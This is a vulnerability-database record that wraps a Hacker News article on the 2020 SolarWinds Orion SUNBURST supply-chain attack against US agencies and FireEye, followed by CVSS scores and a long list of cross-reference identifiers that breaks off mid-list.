DATABASE RESOURCES PRICING ABOUT US

{"id": "THN:E9454DED855ABE5718E4612A2A750A98", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "US Agencies and FireEye Were Hacked Using SolarWinds Software Backdoor", "description": "[](<https://thehackernews.com/images/-Cpd5jYOBXGk/X9b7WId_6xI/AAAAAAAABPY/RSyw2zajv6MRRJNaCspQPEerTW8vEpNpACLcBGAsYHQ/s0/solarwinds.jpg>)\n\nState-sponsored actors allegedly working for Russia have [targeted](<https://www.washingtonpost.com/national-security/russian-government-spies-are-behind-a-broad-hacking-campaign-that-has-breached-us-agencies-and-a-top-cyber-firm/2020/12/13/d5a53b88-3d7d-11eb-9453-fc36ba051781_story.html>) the US Treasury, the Commerce Department's National Telecommunications and Information Administration (NTIA), and other government agencies to [monitor internal email traffic](<https://www.reuters.com/article/us-usa-cyber-amazon-com-exclsuive/exclusive-u-s-treasury-breached-by-hackers-backed-by-foreign-government-sources-idUSKBN28N0PG>) as part of a widespread cyberespionage campaign.\n\nThe Washington Post, citing unnamed sources, said the latest attacks were the work of APT29 or Cozy Bear, the same hacking group that's believed to have orchestrated a breach of US-based cybersecurity firm [FireEye](<https://thehackernews.com/2020/12/cybersecurity-firm-fireeye-got-hacked.html>) a few days ago leading to the theft of its Red Team penetration testing tools.\n\nThe motive and the full scope of what intelligence was compromised remains unclear, but signs are that adversaries tampered with a software update released by Texas-based IT infrastructure provider SolarWinds earlier this year to infiltrate the systems of government agencies as well as FireEye and mount a highly-sophisticated [supply chain attack](<https://en.wikipedia.org/wiki/Supply_chain_attack>).\n\n\"The compromise of SolarWinds' Orion Network Management Products poses unacceptable risks to the security of federal networks,\" said Brandon Wales, acting director of the US Cybersecurity and Infrastructure Security Agency (CISA), which has [released](<https://www.cisa.gov/news/2020/12/13/cisa-issues-emergency-directive-mitigate-compromise-solarwinds-orion-network>) an emergency directive, urging federal civilian agencies to review their networks for suspicious activity and disconnect or power down SolarWinds Orion products immediately.\n\nSolarWinds' networking and security products are used by more than [300,000 customers worldwide](<https://www.solarwinds.com/company/customers>), including Fortune 500 companies, government agencies, and education institutions.\n\nIt also serves several major US telecommunications companies, all five branches of the US Military, and other prominent government organizations such as the Pentagon, State Department, NASA, National Security Agency (NSA), Postal Service, NOAA, Department of Justice, and the Office of the President of the United States.\n\n### An Evasive Campaign to Distribute SUNBURST Backdoor\n\nFireEye, which is tracking the ongoing intrusion campaign under the moniker \"[UNC2452](<https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html>),\" said the supply chain attack takes advantage of trojanized SolarWinds Orion business software updates in order to distribute a backdoor called SUNBURST.\n\n\"This campaign may have begun as early as Spring 2020 and is currently ongoing,\" FireEye said in a Sunday analysis. \"Post compromise activity following this supply chain compromise has included lateral movement and data theft. The campaign is the work of a highly skilled actor and the operation was conducted with significant operational security.\"\n\n[](<https://thehackernews.com/images/-PbITJeTtDpo/X9b7oJ1VO6I/AAAAAAAABPg/V3gShVN1NtYYFwAKCmwfQuhQjkNYMDgQgCLcBGAsYHQ/s0/solarwinds-backdoor.jpg>)\n\nThis rogue version of SolarWinds Orion plug-in, besides masquerading its network traffic as the Orion Improvement Program ([OIP](<https://support.solarwinds.com/SuccessCenter/s/article/Orion-Improvement-Program?language=en_US>)) protocol, is said to communicate via HTTP to remote servers so as to retrieve and execute malicious commands (\"Jobs\") that cover the spyware gamut, including those for transferring files, executing files, profiling and rebooting the target system, and disabling system services.\n\nOrion Improvement Program or OIP is chiefly used to collect performance and usage statistics data from SolarWinds users for product improvement purposes.\n\nWhat's more, the IP addresses used for the campaign were obfuscated by VPN servers located in the same country as the victim to evade detection.\n\nMicrosoft also corroborated the findings in a separate analysis, stating the attack (which it calls \"[Solorigate](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Behavior:Win32/Solorigate.C!dha&ThreatID=2147771132>)\") leveraged the trust associated with SolarWinds software to insert malicious code as part of a larger campaign.\n\n\"A malicious software class was included among many other legitimate classes and then signed with a legitimate certificate,\" the Windows maker said. The resulting binary included a backdoor and was then discreetly distributed into targeted organizations.\"\n\n### SolarWinds Releases Security Advisory\n\nIn a [security advisory](<https://www.solarwinds.com/securityadvisory>) published by SolarWinds, the company said the attack targets versions 2019.4 through 2020.2.1 of the SolarWinds Orion Platform software that was released between March and June 2020, while recommending users to upgrade to Orion Platform release 2020.2.1 HF 1 immediately.\n\nThe firm, which is currently investigating the attack in coordination with FireEye and the US Federal Bureau of Investigation, is also expected to release an additional hotfix, 2020.2.1 HF 2, on December 15, which replaces the compromised component and provides several extra security enhancements.\n\nFireEye last week disclosed that it fell victim to a highly sophisticated foreign-government attack that compromised its software tools used to test the defenses of its customers.\n\nTotaling as many as [60 in number](<https://www.picussecurity.com/resource/blog/techniques-tactics-procedures-utilized-by-fireeye-red-team-tools>), the stolen Red Team tools are a mix of publicly available tools (43%), modified versions of publicly available tools (17%), and those that were developed in-house (40%).\n\nFurthermore, the theft also includes exploit payloads that leverage critical vulnerabilities in Pulse Secure SSL VPN (CVE-2019-11510), Microsoft Active Directory (CVE-2020-1472), Zoho ManageEngine Desktop Central (CVE-2020-10189), and Windows Remote Desktop Services (CVE-2019-0708).\n\nThe campaign, ultimately, appears to be a supply chain attack on a global scale, for FireEye said it detected this activity across several entities worldwide, spanning government, consulting, technology, telecom, and extractive firms in North America, Europe, Asia, and the Middle East.\n\nThe indicators of compromise (IoCs) and other relevant attack signatures designed to counter SUNBURST can be accessed [here](<https://github.com/fireeye/sunburst_countermeasures>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2020-12-14T05:44:00", "modified": "2020-12-14T12:54:22", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 10.0, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 6.0}, "href": "https://thehackernews.com/2020/12/us-agencies-and-fireeye-were-hacked.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2019-0708", "CVE-2019-11510", "CVE-2020-10189", "CVE-2020-1472"], "immutableFields": [], "lastseen": "2022-05-09T12:38:41", "viewCount": 325, "enchantments": {"dependencies": {"references": [{"type": "almalinux", "idList": ["ALSA-2021:1647"]}, {"type": "amazon", "idList": ["ALAS-2021-1469", "ALAS2-2021-1585", "ALAS2-2021-1649"]}, {"type": "archlinux", "idList": ["ASA-202009-17"]}, {"type": "attackerkb", "idList": ["AKB:0C69B33C-2322-4075-BE16-A92593B75107", "AKB:131226A6-A1E9-48A1-A5D0-AC94BAF8DFD2", "AKB:17442CEB-043D-4879-BE5C-FC920511E791", "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "AKB:71F77351-1AE5-4161-8836-D26680828466", "AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "AKB:86915DE7-C5F7-483B-A324-DF5B1929FBF6", "AKB:86F390BB-7946-4223-970A-D493D6DD1E0A", "AKB:F0223615-0DEB-4BCC-8CF7-F9CED07F1876"]}, {"type": "avleonov", "idList": ["AVLEONOV:28E47C69DA4A069031694EB4C2C931BA", "AVLEONOV:93A5CCFA19B815AE15942F533FFD65C4", "AVLEONOV:F17F36C3CC642EBDC27E43900FE3905E"]}, {"type": "canvas", "idList": ["BLUEKEEP"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:19B4E04F8F1723A4F28FA7A8354698AF", "CARBONBLACK:83C94B14C546544713E49B16CCCBF672", "CARBONBLACK:91F55D2B8B2999589579EACB1542A3E9", "CARBONBLACK:971FEABEB6DA17E9D4D3137981B2B685", "CARBONBLACK:A526657711947788A54505B0330C16A0"]}, {"type": "centos", "idList": ["CESA-2020:5439"]}, {"type": "cert", "idList": ["VU:490028", "VU:927237"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-0657", "CPAI-2019-1097", "CPAI-2020-0118", "CPAI-2020-0872", "CPAI-2020-1095"]}, {"type": "cisa", "idList": ["CISA:2B970469D89016F563E142BE209443D8", "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "CISA:5BA27AECCB94A75E13B4091A8F85AD87", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:6EE79BF110142CD46F3BD55025F3C4AB", "CISA:7E93687DEED7F2EA7EFAEBA997B30A5D", "CISA:7FB0A467C0EB89B6198A58418B43D50C", "CISA:81A1472B76D72ABF1AA69524AFD40F34", "CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB", "CISA:A5265FFF4C417EB767D82231D2D604B8", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C", "CISA:E5A33B5356175BB63C2EFA605346F8C7"]}, {"type": "cve", "idList": ["CVE-2019-0708", "CVE-2019-11510", "CVE-2020-10189", "CVE-2020-1472"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2463-1:1381E"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-1472"]}, {"type": "dsquare", "idList": ["E-688"]}, {"type": "exploitdb", "idList": ["EDB-ID:46904", "EDB-ID:47120", "EDB-ID:47297", "EDB-ID:47416", "EDB-ID:49071"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42", "EXPLOITPACK:C90C58C22E53621B5A2A2AAEBCDF2EBC"]}, {"type": "f5", "idList": ["F5:K25238311", "F5:K93951507"]}, {"type": "fedora", "idList": ["FEDORA:38D8230C58CD", "FEDORA:4A64830CFCDC", "FEDORA:D8A0E3053060"]}, {"type": "fireeye", "idList": ["FIREEYE:385EC2DA0B6E50D0AC9113A707F5E623", "FIREEYE:BFB36D22F20651C632D25AA20588E904", "FIREEYE:D64714BFF80E34308579150D4C839557"]}, {"type": "freebsd", "idList": ["24ACE516-FAD7-11EA-8D8C-005056A311D1"]}, {"type": "gentoo", "idList": ["GLSA-202012-24"]}, {"type": "githubexploit", "idList": ["00B8023B-5D2D-5FF7-9F9E-C773ACF38386", "03237B57-97DA-5A83-B4B2-869C01BC59F7", "042AB58A-C86A-5A8B-AED3-2FF3624E97E3", "04BCA9BC-E3AD-5234-A5F0-7A1ED826F600", "05283D8D-AE42-54D4-B0CC-85DEBC639859", "059DC199-E425-50EE-B5F5-E351E0323E69", "06BAC40D-74DF-5994-909F-3A87FC3B76C8", "07DF268C-467E-54A3-B713-057BA19C72F7", "07E56BF6-A72B-5ACD-A2FF-818C48E4E132", "0A8531EC-3F13-5F4F-84B0-58DB34580167", "0CFAB531-412C-57A0-BD9E-EF072620C078", "0DFEFF1E-DC55-5AFB-B968-B09E2E591700", "0F2E8B00-74C7-5BE8-A801-CD92790E4C2E", "0FF9E057-0D2B-510C-944D-3EDF8DD10956", "12E44744-1AF0-523A-ACA2-593B4D33E014", "14BD2DBD-3A91-55FC-9836-14EF9ABF56CF", "154F9E24-FA6C-529E-8E63-1351432DF6B9", "17650B64-ADED-58F1-9BB3-3E82E1E41A7B", "188C3DB2-3A7F-5EBA-BA09-2075364C0B07", "19F70587-89FB-5855-A578-0E55C3510C59", "20466D13-6C5B-5326-9C8B-160E9BE37195", "21DA1B2C-2176-5C7C-9A56-480839AAC71E", "2255B39F-1B91-56F4-A323-8704808620D3", "28D42B84-AB24-5FC6-ADE1-610374D67F21", "2D16FB2A-7A61-5E45-AAF8-1E090E0ADCC0", "2D3B67A4-8F34-55EA-A7ED-97FB2D1DFFF8", "2E71FF50-1B48-5A8E-9212-C4CF9399715C", "31DB22CD-3492-524F-9D26-035FC1086A71", "33E38C38-2570-5B7D-910F-D6D0C9B85E25", "34097FEA-E06F-5637-817F-25A5BA9D5B34", "3CAE8C9E-534F-5617-88B5-977EE6076A10", "3D70055A-AC27-5338-B4C8-D1ED2158F5C9", "3F400483-1F7E-5BE5-8612-4D55D450D553", "41FED3D6-8A23-5549-A390-D444A882F85D", "42C0F4E5-C3C8-5987-AF1E-3EB9DC15EADE", "462438E9-2947-5006-9134-9BA0BCC1B262", "47353949-6FA1-5C88-86DB-8E2DFD66576A", "49EC151F-12F0-59CF-960C-25BD54F46680", "4C2C36F6-5E15-51DD-85A7-E5828F1D8CE0", "4CB63A18-5D6F-57E3-8CD8-9110CF63E120", "4E477E4A-4794-5B4A-8706-915B06422C95", "50FA6373-CBCD-5EF5-B37D-0ECD621C6134", "523F993F-2487-5C75-A910-22605D6D57D9", "52814444-4FCC-517B-B4B3-6DC5C4A27AA6", "560405C4-4806-5173-B662-F9C3D776D8D4", "5B025A0D-055E-552C-B1FB-287C6F191F8E", "5E80DB20-575C-537A-9B83-CCFCCB55E448", "62891769-2887-58A7-A603-BCD5E6A6D6F9", "63C36F7A-5F99-5A79-B99F-260360AC237F", "656CA49C-78E0-596B-BAA2-1A2890C0E150", "6FB0B63E-DE9A-5065-B577-ECA3ED5E9F4B", "7078ED42-959E-5242-BE9D-17F2F99C76A8", "74F3783A-C87E-56C3-91DB-25921D7EC82E", "75BE41BF-9117-5065-8E2C-3F7F041E53AA", "75C1CD91-459D-5E2F-A3AC-FB4FE66230F7", "765DCAD5-2789-5451-BBFA-FAD691719F7A", "77912E98-768B-5AF5-AE06-1F42C6D88F72", "7D04F2C9-F17B-502A-BBE9-9B5CA537E468", "8005DDB7-67F0-50C1-95AC-3D602A70CEC8", "851959DE-3B5C-5317-868E-5D80E801E3B0", "879CF3A7-ECBC-552A-A044-5E2724F63279", "87B06BBD-7ED2-5BD2-95E1-21EE66501505", "8BAEEC14-CD55-5C55-A910-47030BEA55F7", "939F3BE7-AF69-5351-BD56-12412FA184C5", "998F5B8B-817B-5B22-BEBB-11F0DC59638F", "9A0A7E66-6C4F-56E6-8F29-1DCE34FA1D12", "9C9BD402-511C-597D-9864-647131FE6647", "9D170C46-A745-5692-BA84-67EBFEA037FF", "A24AC1AC-55EF-51D8-B696-32F369DCAB96", "A839FA86-0873-592C-AA31-2C445B4C4F29", "AA7339B7-CAB1-5DEA-8E7C-5867B328A25F", "AE03C974-B00F-5DF7-B2AF-77D6E46CD5FD", "AEF449B8-DC3E-544A-A748-5A1C6F7EBA59", "B042A63E-E661-5B8E-9AA1-F0DEE4C18402", "B3DCB90F-80B1-5462-AC61-AF04513F2F3A", "B3FAEE67-7743-52ED-89D0-D83BAEA1A38D", "B7C1C535-3653-5D12-8922-4C6A5CCBD5F3", "BA12D007-F6E5-5BB6-874F-789DCAE9524E", "BA280EB1-2FF9-52DA-8BA4-A276A1158DD8", "BA9FEAFF-DC39-53B5-B03D-8A01486E0879", "BBE1926E-1EC7-5657-8766-3CA8418F815C", "BBEEB41B-D67F-54B6-BA27-1956F83AAAC5", "BE90B1DD-521D-540C-8554-5454779256A5", "C467EA51-59B6-5BEB-A634-62EFC2DC4419", "C4A313B8-6946-51D9-A5C4-EF515BAC47C9", "C50B5DBC-9051-5380-B5B3-93A023128F22", "C5B49BD0-D347-5AEB-A774-EE7BB35688E9", "C641C472-7F12-5C7B-9934-BE59C8B1974B", "C7CE5D12-A4E5-5FF2-9F07-CD5E84B4C02F", "C7F6FB3B-581D-53E1-A2BF-C935FE7B03C8", "C841D92F-11E1-5077-AE70-CA2FEF0BC96E", "C89AC173-55D4-50C8-A17E-42EB65710CCB", "C9FCD26D-4C04-5F36-8E61-05484E6979D6", "CA34E4C9-BC58-5284-81F7-EC6AC06EC7AF", "CD0102AD-F33A-5068-9719-30CB0CB3C152", "CF07CF32-0B8E-58E5-A410-8FA68D411ED0", "CF1C1A91-4D20-553C-A027-71BE18F8BAA5", "D178DAA4-01D0-50D0-A741-1C3C76A7D023", "D2A01405-1B4C-5B8D-85AC-D1E23D1F3B56", "D3C401E0-D013-59E2-8FFB-6BEF41DA3D1B", "D4DF3FFF-4FBA-5ADB-88FC-A7E1BED572B9", "D6710F36-D7F3-57EA-BD83-CED78FC054F6", "D7EF2A21-5BA9-5730-90E0-E085DDFD2801", "D8B68D98-BBF3-5A69-82DD-C0760C9923D4", "DB6F697E-55A0-538F-A15B-E61B8B4E4D70", "DC044D23-6D59-5326-AB78-94633F024A74", "DC8A29A1-755A-50C2-9D9D-FF11FCB054F2", "DEC5B8BB-1933-54FF-890E-9C2720E9966E", "DF00B503-1F21-5ABD-B713-1F79E4D1CB9A", "E22A392B-5D30-51F4-92ED-8E10BA7EE8D2", "E46AAFC9-276F-5161-B013-393D9A538259", "E5B0F794-87CD-5152-9D64-3AB23AF5C3EF", "E72D9129-EEED-5E3C-9CD8-9BD6201170C0", "E7B26D35-BAFD-51CB-BFAC-CA7E5EA5FA9A", "E8AD52BD-4EE5-5E85-91FE-66A868E0162B", "E9F25671-2BEF-5E8B-A60A-55C6DD9DE820", "F085F702-F1C3-5ACB-99BE-086DA182D98B", "F472C105-E3B1-524A-BBF5-1C436185F6EE", "F5B92B0D-E802-5254-8668-D6A4B1DB8004", "F922DD70-E22B-5EBE-9CAE-410224E95831", "F9EF1801-C66C-572B-B67A-9A67E04D6B06", "FBB9B577-00A5-5C82-AFC5-4A52422056F3", "FC661572-B96B-5B2C-B12F-E8D279E189BF", "FE544217-2BB0-5C05-B26C-D14EE378E8A5", "FFBF7B7B-FFD8-5A32-89B0-AAB175FD2AE6", "FFF6224F-273A-5CB1-9421-833769E01519"]}, {"type": "hackerone", "idList": ["H1:591295", "H1:671749", "H1:678496", "H1:680480", "H1:695005"]}, {"type": "hivepro", "idList": ["HIVEPRO:8DA601C83DB9C139357327C06B06CB36"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190529-01-WINDOWS", "HUAWEI-SA-20201105-01-NETLOGON"]}, {"type": "ibm", "idList": ["8190BE7075BCD3ECD99D09840619467A00B84599B985C4B2AB342389339984B1"]}, {"type": "ics", "idList": ["ICSMA-20-049-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:A1972445B3E03EDA92E53FFFBD6771BD", "IMPERVABLOG:A30E92D9B177CCFF9F5476DD34E25F51"]}, {"type": "kaspersky", "idList": ["KLA11706", "KLA11929", "KLA11931"]}, {"type": "kitploit", "idList": ["KITPLOIT:102871766956097088", "KITPLOIT:1049860926455958760", "KITPLOIT:1207079539580982634", "KITPLOIT:1225614657733366094", "KITPLOIT:1494860154339275183", "KITPLOIT:1844185171331211854", "KITPLOIT:1986765330027575502", "KITPLOIT:2730308475904875028", "KITPLOIT:3080370456145673111", "KITPLOIT:3124960652240981745", "KITPLOIT:3245813529202482542", "KITPLOIT:3359946123198241398", "KITPLOIT:3397940664053959113", "KITPLOIT:3565898196234868215", "KITPLOIT:4019975092566820832", "KITPLOIT:4205221140433081492", "KITPLOIT:43221571859278589", "KITPLOIT:4421457840699592233", "KITPLOIT:4482238198881011483", "KITPLOIT:4707889613618662864", "KITPLOIT:5485948766090500662", "KITPLOIT:5528727998547000766", "KITPLOIT:5769166566971079899", "KITPLOIT:5896951739767119270", "KITPLOIT:6073614302403805969", "KITPLOIT:6082359615438809301", "KITPLOIT:6972580572774284552", "KITPLOIT:724832466163115459", "KITPLOIT:727243444931520192", "KITPLOIT:777119556142010019", "KITPLOIT:7915799087007906859", "KITPLOIT:8309365460568193500", "KITPLOIT:8418780960315245103", "KITPLOIT:998955151150716619"]}, {"type": "krebs", "idList": ["KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "KREBS:952ACEBFD55EBD076910C6B233491883", "KREBS:A8F0DD3F6E965A3A66B2CCBB003ACF62", "KREBS:C93CCA23099AC250E702848B49677D5B"]}, {"type": "mageia", "idList": ["MGASA-2020-0380"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:31DFC46E307127AF5C9FD13F15DF62DB", "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "MALWAREBYTES:6ECB9DE9A2D8D714DB50F19BAF7BF3D4", "MALWAREBYTES:78E91E28F51B0A15B6CA53FF8A9B480B", "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "MALWAREBYTES:8B41C7471B07595F7246D3DCB8794894", "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-ADMIN-DCERPC-CVE_2020_1472_ZEROLOGON-", "MSF:AUXILIARY-SCANNER-RDP-CVE_2019_0708_BLUEKEEP-", "MSF:EXPLOIT-WINDOWS-RDP-CVE_2019_0708_BLUEKEEP_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:D6D537E875C3CBD84822A868D24B31BA", "MMPC:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "mscve", "idList": ["MS:CVE-2019-0708", "MS:CVE-2020-1472"]}, {"type": "mskb", "idList": ["KB4601315", "KB4601318", "KB4601319", "KB4601345", "KB4601347", "KB4601348", "KB4601349", "KB4601357", "KB4601363", "KB4601384"]}, {"type": "msrc", "idList": ["MSRC:181F9F2B53D93B5825CF48DFEB8D11C7", "MSRC:4D3D99779455BE99499289F3B3A35F84", "MSRC:5B84BD451283462DC81D4090EFE66280", "MSRC:6A6ED6A5B652378DCBA3113B064E973B", "MSRC:96F2FB0D77EED0ABDED8EBD64AEBEA09"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:9A5D03B503C4E238EEFD4BF9E93C78A9", "MSSECURE:B42B640CBAB51E35DC07B81926B5F910", "MSSECURE:D6D537E875C3CBD84822A868D24B31BA", "MSSECURE:E0AA6CC56D602890BBD5AF46A036FE67", "MSSECURE:E3C8B97294453D962741782EC959E79C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994152", "MYHACK58:62201994153", "MYHACK58:62201994154", "MYHACK58:62201994162", "MYHACK58:62201994234", "MYHACK58:62201994259", "MYHACK58:62201994388", "MYHACK58:62201995234", "MYHACK58:62201995523", "MYHACK58:62201995674", "MYHACK58:62201995881"]}, {"type": "nessus", "idList": ["7286.PASL", "AL2_ALAS-2021-1585.NASL", "ALA_ALAS-2021-1469.NASL", "ALMA_LINUX_ALSA-2021-1647.NASL", "CENTOS8_RHSA-2021-1647.NASL", "CENTOS_RHSA-2020-5439.NASL", "DEBIAN_DLA-2463.NASL", "EULEROS_SA-2020-2171.NASL", "EULEROS_SA-2020-2181.NASL", "EULEROS_SA-2020-2299.NASL", "EULEROS_SA-2020-2396.NASL", "EULEROS_SA-2021-1050.NASL", "EULEROS_SA-2021-1118.NASL", "EULEROS_SA-2021-1517.NASL", "EULEROS_SA-2021-1533.NASL", "EULEROS_SA-2021-1625.NASL", "EULEROS_SA-2021-1635.NASL", "EULEROS_SA-2021-2168.NASL", "FEDORA_2020-0BE2776ED3.NASL", "FEDORA_2020-77C15664B0.NASL", "FEDORA_2020-A1D139381A.NASL", "FREEBSD_PKG_24ACE516FAD711EA8D8C005056A311D1.NASL", "GENTOO_GLSA-202012-24.NASL", "MANAGEENGINE_DESKTOP_CENTRAL_100479.NASL", "MANAGEENGINE_DESKTOP_CENTRAL_CVE-2020-10189.NBIN", "MSRDP_CVE-2019-0708.NBIN", "NETLOGON_ZEROLOGON_CVE-2020-1472.NBIN", "NEWSTART_CGSL_NS-SA-2021-0024_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2021-0167_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2022-0058_SAMBA.NASL", "OPENSUSE-2020-1513.NASL", "OPENSUSE-2020-1526.NASL", "ORACLELINUX_ELSA-2020-5439.NASL", "ORACLELINUX_ELSA-2021-1647.NASL", "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "PULSE_CONNECT_SECURE-SA-44101.NASL", "PULSE_CONNECT_SECURE_PATH_TRAVERSAL.NBIN", "REDHAT-RHSA-2020-5439.NASL", "REDHAT-RHSA-2021-1647.NASL", "REDHAT-RHSA-2021-3723.NASL", "SL_20201215_SAMBA_ON_SL7_X.NASL", "SMB_NT_MS19_MAY_4499149.NASL", "SMB_NT_MS19_MAY_4499164.NASL", "SMB_NT_MS19_MAY_XP_2003.NASL", "SMB_NT_MS20_AUG_4565349.NASL", "SMB_NT_MS20_AUG_4571694.NASL", "SMB_NT_MS20_AUG_4571703.NASL", "SMB_NT_MS20_AUG_4571729.NASL", "SMB_NT_MS20_AUG_4571736.NASL", "SMB_NT_MS21_FEB_4601347.NASL", "SUSE_SU-2020-2719-1.NASL", "SUSE_SU-2020-2720-1.NASL", "SUSE_SU-2020-2721-1.NASL", "SUSE_SU-2020-2722-1.NASL", "SUSE_SU-2020-2724-1.NASL", "SUSE_SU-2020-2730-1.NASL", "UBUNTU_USN-4510-1.NASL", "UBUNTU_USN-4559-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108611", "OPENVAS:1361412562310108794", "OPENVAS:1361412562310814894", "OPENVAS:1361412562310815051", "OPENVAS:1361412562310815054"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2021"]}, {"type": "oraclelinux", "idList": ["ELSA-2020-5439", "ELSA-2021-1647"]}, {"type": "osv", "idList": ["OSV:DLA-2463-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153133", "PACKETSTORM:153627", "PACKETSTORM:154176", "PACKETSTORM:154579", "PACKETSTORM:156730", "PACKETSTORM:160127", "PACKETSTORM:162960"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:8FD1C9A0D76A3084445136A0275847C0"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:192411B44569225E2F2632594DC4308C", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:3B1C0CD4DA2F528B07C93411EA447658", "QUALYSBLOG:400D28FE44174674BB4561AA9416F532", "QUALYSBLOG:563DC556FF331059CAC2F71B19B341B5", "QUALYSBLOG:5A5094DBFA525D07EBC3EBA036CDF81A", "QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:A730164ABD0AA0A58D62EAFAB48628AD", "QUALYSBLOG:AE1D32AF43539C7362B2E060204A5413", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "QUALYSBLOG:FBDC4B445E6B33502BA1650A8BD4A6E1"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:0C3EDBDC537092A20C850F762D5A5856", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:486F801929E1F794197FC08AE13E4CB5", "RAPID7BLOG:49C18614AD01B6865616A65F734B9F71", "RAPID7BLOG:5586742AC0F1C66F56B3583482B0960A", "RAPID7BLOG:7549D87CE6E6AE596B8031184231ECD1", "RAPID7BLOG:C628D3D68DF3AE5A40A1F0C9DFA38860", "RAPID7BLOG:F4F1A7CFCF2440B1B23C1904402DDAF2"]}, {"type": "redhat", "idList": ["RHSA-2020:5439", "RHSA-2021:1647", "RHSA-2021:3723"]}, {"type": "redhatcve", "idList": ["RH:CVE-2020-1472"]}, {"type": "samba", "idList": ["SAMBA:CVE-2020-1472"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:847981DCB9E90C51F963EE1727E40915", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "srcincite", "idList": ["SRC-2020-0011"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:1513-1", "OPENSUSE-SU-2020:1526-1"]}, {"type": "symantec", "idList": ["SMNTC-108273"]}, {"type": "talosblog", "idList": ["TALOSBLOG:00DC30A0F4EFA56F4974DF2C3FB23FBB", 